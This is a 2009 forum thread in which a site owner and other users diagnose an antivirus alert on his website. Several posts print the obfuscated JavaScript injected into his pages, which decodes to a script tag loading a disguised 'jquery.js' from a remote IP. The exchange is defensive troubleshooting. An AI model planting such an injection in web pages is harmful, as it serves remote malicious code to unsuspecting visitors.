Page 1 of 2
innovativelychallenged
Posted: Thu Apr 30, 2009 5:25 am
by informactive
I get a NoScript warning saying below site has a virus.
http://www.innovativelychallenged.com
could it be statcounter script?
thanks.
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 5:51 am
by therube
Is this another of your websites?
How are you accessing
http://www.innovativelychallenged.com/?
From a bookmark? From a Google search?
This is on your site:
Code: Select all
<script language=javascript><!--
document.write(unescape('%3CcasR9ac336rOVJipOVJtYq2%20OVJsYq2r7Nc336%3D336%2F%2Fca94%2EYq2247%2E2Yb%2Eca193365%2F336jquerYq2y%2Ejs7N%3E%3C%2FscrcaiptOVJ%3E').replace(/Yq2|7N|ca|336|R9a|OVJ|Yb/g,""));
--></script><body>
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 5:54 am
by Alan Baxter
I've never seen NoScript warning about a virus. I don't think it has that capability. "I get a NoScript warning saying below site has a virus." doesn't give us enough information to help you.
I've loaded that site in my Firefox NoScript test profile, using Sandboxie for safety, and see no problem. I'm not about to start randomly clicking links or changing NoScript settings in an attempt to figure out what you're talking about, informactive. I think you need to be a lot more specific, i.e. give exact steps to reproduce your issue and a full description of what you see.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
NoScript 1.9.2.3
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 5:58 am
by informactive
I re uploaded index.html page and it seems to be okay now.
but what page did you find all this?
<script language=javascript><!--
document.write(unescape('%3CcasR9ac336rOVJipOVJtYq2%20OVJsYq2r7Nc336%3D336%2F%2Fca94%2EYq2247%2E2Yb%2Eca193365%2F336jquerYq2y%2Ejs7N%3E%3C%2FscrcaiptOVJ%3E').replace(/Yq2|7N|ca|336|R9a|OVJ|Yb/g,""));
--></script><body>
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 6:03 am
by therube
One the first page itself.
But I'm not sure when it showed up.
Originally when I looked through the source, I did not notice it. (I may <or may not> have noticed it.)
Since I didn't catch anything right off, I Allowed innovativelychallenged.com. (Late, tired, not sure what I did next or after?) But at some point I did get that code in the source.
Now sometimes these exploits log IP's so that you will only see it once. So the second time you go looking for it, it is hidden from you. As it appears to be from me now?
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 6:06 am
by informactive
Sorry it was not a NoScript warning it was an advast warning.
http://i255.photobucket.com/albums/hh13 ... 230131.gif
There is not a whole lot on any of these pages let along script other than Statcounter on index.html.
are you looking at page other than like source view?
thanks
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 6:19 am
by therube
But if you changed the page source ... heh.
Read here, & pay particular attention to post#10,
AVAST Forum: JS-Redirector-G [trj] warning.
And you are likely to find that code <again> on every one of your pages (& sub-pages).
It is on d577570.htm right now.
Only Sophos tagged it, even though they also scan with Avast:
VirusTotal: File d577570.htm.VIR.htm
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 6:48 am
by informactive
I'm using expression web and this is all I see in my design of d577570.htm. Where is redirector script hiding?
I tried reading favicon.ico using notepad and nothing I could find looking like script.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"
http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="shortcut icon" href="favicon.ico">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="description" content="D577570 design patent">
<meta name="keywords" content="design, patent, D577570">
<meta name="revisit-after" content="15 days">
<meta name="rating" content="General">
<meta name="ROBOTS" content="ALL">
<style type="text/css">
.style1 {
text-align: center;
margin-top: 0px;
}
.style2 {
border-width: 0px;
font-family:Arial, Helvetica, sans-serif;
}
.style3 {
vertical-align: bottom;
border:0px;
}
.style4 {
text-align: left;
}
</style>
</head>
<body>
<div style="position: absolute; width: 100px; height: 70px; z-index: 1; left: 784px; top: 669px" id="layer1" class="style4">
<a href="
http://www.innovativelychallenged.com/index.html">
<img alt="" src="images/returnic.gif" width="197" height="33" class="style2"></a></div>
<p class="style1"><img alt="" src="images/d577570.gif"></p>
</body>
</html>
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 6:52 am
by therube
Going back to the "
94.247.2.195", once that code is on your page, & then once you Allow your page (innovativelychallenged as the case may be) & it refreshed, that code, JavaScript code is then interpreted, & at that point the 94.247.2.195 then shows up as a site that can than be Allowed in NoScript (not that you would ever want to do that).
If you subsequently forbid your site, even though that code is then blocked (?), you are still reading from your disk cash, & so the 94.247.2.195 will still show up in NoScript. If you force+refresh (Ctrl+F5 or similar), then the page will reload from the server, & the 94.247.2.195 will no longer show in NoScript.
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 6:53 am
by therube
This is what I get:
Code: Select all
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="shortcut icon" href="favicon.ico">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="description" content="D577570 design patent">
<meta name="keywords" content="design, patent, D577570">
<meta name="revisit-after" content="15 days">
<meta name="rating" content="General">
<meta name="ROBOTS" content="ALL">
<style type="text/css">
.style1 {
text-align: center;
margin-top: 0px;
}
.style2 {
border-width: 0px;
font-family:Arial, Helvetica, sans-serif;
}
.style3 {
vertical-align: bottom;
border:0px;
}
.style4 {
text-align: left;
}
</style>
</head>
<script language=javascript><!--
document.write(unescape('%3CcasR9ac336rOVJipOVJtYq2%20OVJsYq2r7Nc336%3D336%2F%2Fca94%2EYq2247%2E2Yb%2Eca193365%2F336jquerYq2y%2Ejs7N%3E%3C%2FscrcaiptOVJ%3E').replace(/Yq2|7N|ca|336|R9a|OVJ|Yb/g,""));
--></script><body>
<div style="position: absolute; width: 100px; height: 70px; z-index: 1; left: 784px; top: 669px" id="layer1" class="style4">
<a href="http://www.innovativelychallenged.com/index.html">
<img alt="" src="images/returnic.gif" width="197" height="33" class="style2"></a></div>
<p class="style1"><img alt="" src="images/d577570.gif"></p>
</body>
</html>
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 6:55 am
by GµårÐïåñ
I don't get anything, even with avast installed.
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 7:03 am
by therube
Essentially the same, but ... the favicon, talked about in the link above, & the JavaScript exploit code itself.
<link rel="shortcut icon" href="favicon.ico"> === <link rel="shortcut icon" href="
http://www.innovativelychallenged.com/favicon.ico">
(You may have to View Image to see it fully <at least as much as I captured>.)
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 7:13 am
by therube
Correction must be made by administrator/owner of the website avast alerts about.
Somewhere in your code is link to favicon which actualy doesnt exist. Server generates 404 message which is infected. Please check server generated messages.
Note that the Avast forum thread (above) is ongoing.
First of all being secure doesn’t mean to just install firewalls, anti-viruses, ... This favicon and also XSS attacks fall into a category that can’t be handled by just installing few security tools. Reason their host/carriers through which they intrude into your system are common internet resources like web-pages, emails, RSS feeds, URLs etc. As a result it is difficult to identify & block such resources selectively unless a central repository maintaining a blacklist of potentially dangerous resources is referenced before access. Firefox and other modern browsers are doing this these days. But this is effective only when the resource has been identified and added previously to the blacklist. Ultimately the option left is to only allow the scripts from the resources you rely like Google & Yahoo (matter of choice). This is what NoScript and Request policy does. NoScript by default blocks all the flash and javascript content on the pages you visit unless you add them (more specifically website domain or address) to it’s whitelist. RequestPolicy goes one step ahead and blocks javascript content originating or communicating from the server you are not visiting on first place, even if it is in the whitelist. The fundamental thing is simple to block all the resources/communication outside the current resource you are browsing. For more details I would recommend you to read FAQs on NoScript & RequestPolicy websites.
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 2:23 pm
by informactive
The Rube wins on this one.
I did a control F5 on each *.htm file and uploaded them all back to 1and1 and there is no Virus alert at any of them
Now that I see d577570.htm on my screen without Advast warning I go to view source and do not see script on that page below heading so I guess all is well.
I use
http://www.diskcleaner.nl/ pretty much every day or so to clean up my cache. Is it missing files when it cleans or should I try another cache remover? I also clean with Firefox clean cache option under tools every other day or so.
thanks.
Going back to the "94.247.2.195", once that code is on your page, & then once you Allow your page (innovativelychallenged as the case may be) & it refreshed, that code, JavaScript code is then interpreted, & at that point the 94.247.2.195 then shows up as a site that can than be Allowed in NoScript (not that you would ever want to do that).
If you subsequently forbid your site, even though that code is then blocked (?), you are still reading from your disk cash, & so the 94.247.2.195 will still show up in NoScript. If you force+refresh (Ctrl+F5 or similar), then the page will reload from the server, & the 94.247.2.195 will no longer show in NoScript.
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 2:56 pm
by informactive
I went searching for a new cleaner and found
http://www.ccleaner.com/
and it found 60MB of files to clean. I cleaned them and fortunately my computer appears to still be functioning.
Perhaps ccleaner will do a better job of cleaning my cache if cleaning my cache had something to do with doing Control F5 on my site.
thanks.
